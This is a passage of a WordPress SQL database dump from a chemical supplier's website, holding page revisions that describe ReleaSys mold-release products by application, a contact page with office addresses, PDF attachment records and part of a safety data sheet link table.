width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n<p><a name="concrete"></a></p>\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n<p><a name="custom"></a></p>\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable of developing a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-09 13:00:20', '2017-06-09 13:00:20', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4539, 2, '2017-06-09 13:01:25', '2017-06-09 13:01:25', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n<center>\r\n[button text="ADVANCED COMPOSITES" size="small" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" size="small" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" size="small" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" size="small" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS" size="small" link="#injection"]\r\n\r\n[button text="FIBERGLASS" size="small" link="#fiber"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE" size="small" link="#concrete"]\r\n\r\n[button text="CUSTOM FORMULATIONS" size="small" link="#custom"]\r\n</center>\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n<p><a name="polyurethane"></a></p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver a superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high-performance chemistry adheres tenaciously to mold surfaces such as aluminum, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n<p><a name="injection"></a></p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n<p><a name="fiber"></a></p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="concrete"></a></p>\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="custom"></a></p>\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable of developing a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-09 13:01:25', '2017-06-09 13:01:25', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4540, 0, '2017-06-09 13:54:47', '2017-06-09 13:54:47', '', '', '', 'publish', 'closed', 'closed', '', '4540', '', '', '2017-06-09 13:54:47', '2017-06-09 13:54:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/4540/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4541, 0, '2017-06-10 21:56:39', '2017-06-10 21:56:39', '', '', '', 'publish', 'closed', 'closed', '', '4541', '', '', '2017-06-10 21:56:39', '2017-06-10 21:56:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/4541/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4542, 0, '2017-06-12 00:38:32', '2017-06-12 00:38:32', '', '', '', 'publish', 'closed', 'closed', '', '4542', '', '', '2017-06-12 00:38:32', '2017-06-12 00:38:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/4542/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4543, 0, '2017-06-12 18:01:01', '2017-06-12 18:01:01', '', '', '', 'publish', 'closed', 'closed', '', '4543', '', '', '2017-06-12 18:01:01', '2017-06-12 18:01:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/4543/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4544, 0, '2017-06-12 18:33:19', '2017-06-12 18:33:19', '', '', '', 'publish', 'closed', 'closed', '', '4544', '', '', '2017-06-12 18:33:19', '2017-06-12 18:33:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/4544/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4545, 0, '2017-06-13 15:24:57', '2017-06-13 15:24:57', '', '', '', 'publish', 'closed', 'closed', '', '4545', '', '', '2017-06-13 15:24:57', '2017-06-13 15:24:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/4545/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4546, 0, '2017-06-13 18:12:10', '2017-06-13 18:12:10', '', '', '', 'publish', 'closed', 'closed', '', '4546', '', '', '2017-06-13 18:12:11', '2017-06-13 18:12:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4546/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4547, 2, '2017-06-13 18:15:51', '2017-06-13 18:15:51', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ninja_forms_display_form id="1"]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>Global Offices</h3>\r\n<strong>Corporate Office</strong>\r\n55 Backus Ave.\r\nDanbury, CT 06810-7328\r\n800.442.3424\r\nFax 203.791.8702\r\ne-mail: ctsales@mschem.com\r\n\r\n<strong>Illinois</strong>\r\n6321 W. Dempster St. #302\r\nMorton Grove, IL 60053\r\n847.966.2022 / 800.447.4866\r\nFax 847.966.8468\r\ne-mail: ilsales@mschem.com\r\n\r\n<strong>California</strong>\r\n12261 Foothill Blvd.\r\nSylmar, CA 91342\r\n818.896.4714 / 800.771.8161\r\nFax 818.896.6086\r\ne-mail: casales@mschem.com\r\n\r\n<strong>Canada</strong>\r\n280 Belfield Road\r\nToronto, Ontario M9W 1H6\r\n800.307.2199\r\nFax 416.674.2987\r\ne-mail: canadasales@mschem.com\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col]\r\n\r\n[/col]\r\n\r\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2017-06-13 18:15:51', '2017-06-13 18:15:51', '', 120, 'https://www.miller-stephenson.com/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4548, 0, '2017-06-13 22:23:43', '2017-06-13 22:23:43', '', '', '', 'publish', 'closed', 'closed', '', '4548', '', '', '2017-06-13 22:23:43', '2017-06-13 22:23:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/4548/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4549, 0, '2017-06-13 23:53:28', '2017-06-13 23:53:28', '', '', '', 'publish', 'closed', 'closed', '', '4549', '', '', '2017-06-13 23:53:28', '2017-06-13 23:53:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/4549/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4550, 0, '2017-06-14 08:21:50', '2017-06-14 08:21:50', '', '', '', 'publish', 'closed', 'closed', '', '4550', '', '', '2017-06-14 08:21:50', '2017-06-14 08:21:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4550/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4551, 0, '2017-06-14 15:52:24', '2017-06-14 15:52:24', '', '', '', 'publish', 'closed', 'closed', '', '4551', '', '', '2017-06-14 15:52:24', '2017-06-14 15:52:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/4551/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4552, 0, '2017-06-14 18:16:10', '2017-06-14 18:16:10', '', '', '', 'publish', 'closed', 'closed', '', '4552', '', '', '2017-06-14 18:16:11', '2017-06-14 18:16:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4552/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4553, 0, '2017-06-14 21:06:24', '2017-06-14 21:06:24', '', '', '', 'publish', 'closed', 'closed', '', '4553', '', '', '2017-06-14 21:06:24', '2017-06-14 21:06:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/4553/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4554, 0, '2017-06-14 21:32:35', '2017-06-14 21:32:35', '', '', '', 'publish', 'closed', 'closed', '', '4554', '', '', '2017-06-14 21:32:35', '2017-06-14 21:32:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/4554/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4555, 0, '2017-06-15 08:44:44', '2017-06-15 08:44:44', '', '', '', 'publish', 'closed', 'closed', '', '4555', '', '', '2017-06-15 08:44:45', '2017-06-15 08:44:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4555/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4556, 0, '2017-06-15 12:47:17', '2017-06-15 12:47:17', '', '', '', 'publish', 'closed', 'closed', '', '4556', '', '', '2017-06-15 12:47:17', '2017-06-15 12:47:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/4556/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4557, 0, '2017-06-15 13:41:10', '2017-06-15 13:41:10', '', '', '', 'publish', 'closed', 'closed', '', '4557', '', '', '2017-06-15 13:41:10', '2017-06-15 13:41:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/4557/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4558, 0, '2017-06-15 13:48:01', '2017-06-15 13:48:01', '', '', '', 'publish', 'closed', 'closed', '', '4558', '', '', '2017-06-15 13:48:01', '2017-06-15 13:48:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/4558/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4559, 0, '2017-06-15 14:08:24', '2017-06-15 14:08:24', '', '', '', 'publish', 'closed', 'closed', '', '4559', '', '', '2017-06-15 14:08:24', '2017-06-15 14:08:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/4559/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4562, 317, '2017-06-15 14:32:34', '2017-06-15 14:32:34', '', '10x-italian', '', 'inherit', 'closed', 'closed', '', '10x-italian', '', '', '2017-06-15 14:32:34', '2017-06-15 14:32:34', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X-Italian.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4563, 317, '2017-06-15 14:35:11', '2017-06-15 14:35:11', '', '10x-eu-1272-2008-cpl', '', 'inherit', 'closed', 'closed', '', '10x-eu-1272-2008-cpl', '', '', '2017-06-15 14:35:11', '2017-06-15 14:35:11', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X-EU-1272-2008-CPL.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4564, 317, '2017-06-15 14:35:13', '2017-06-15 14:35:13', '', '10x-italian', '', 'inherit', 'closed', 'closed', '', '10x-italian-2', '', '', '2017-06-15 14:35:13', '2017-06-15 14:35:13', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X-Italian-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4565, 317, '2017-06-15 14:35:15', '2017-06-15 14:35:15', '', '10x', '', 'inherit', 'closed', 'closed', '', '10x-2', '', '', '2017-06-15 14:35:15', '2017-06-15 14:35:15', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4566, 317, '2017-06-15 14:35:17', '2017-06-15 14:35:17', '', '246', '', 'inherit', 'closed', 'closed', '', '246', '', '', '2017-06-15 14:35:17', '2017-06-15 14:35:17', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/246.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4567, 317, '2017-06-15 14:35:18', '2017-06-15 14:35:18', '', '250-series', '', 'inherit', 'closed', 'closed', '', '250-series-2', '', '', '2017-06-15 14:35:18', '2017-06-15 14:35:18', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/250-Series-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4568, 317, '2017-06-15 14:35:20', '2017-06-15 14:35:20', '', '280', '', 'inherit', 'closed', 'closed', '', '280', '', '', '2017-06-15 14:35:20', '2017-06-15 14:35:20', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/280.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4569, 317, '2017-06-15 19:59:30', '2017-06-15 19:59:30', '<h1>Miller-Stephenson SDS database.</h1>\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 203-743-4447 (8-4 E.T.)\n<table width="1119">\n<tbody>\n<tr>\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/124H-15.pdf">MS-124H</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/467C.pdf">MS-467C</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT523.pdf">AUT 523</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907B.pdf">MS-907 Part B</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242L.pdf">MS-242L</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126HUV.pdf">MS-126HUV</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ERED.pdf">MS-122E RED</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470C-16.pdf">MS-470C</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT1045.pdf">AUT 1045</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908A.pdf">MS-908 Part A</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/242L-AS-17.pdf">MS-242L-AS</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383A.pdf">MS-383A</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SE.pdf">MS-122SE</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/02/472C-15.pdf">MS-472C</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2045.pdf">AUT 2045</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908B.pdf">MS-908 Part B</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242N.pdf">MS-242N</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383H.pdf">MS-383H</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SD.pdf">MS-122SD</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470S-16.pdf">MS-470S</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2245.pdf">AUT 2245</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910A.pdf">MS-910 Part A</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/05/242N-AS-17.pdf">MS-242N-AS</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383HUV.pdf">MS-383HUV</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122XD.pdf">MS-122XD</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/472S.pdf">MS-472S</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143.pdf">143 SERIES</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910B.pdf">MS-910 Part B</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381H</a></td>\n<td style="text-align: center;"><a 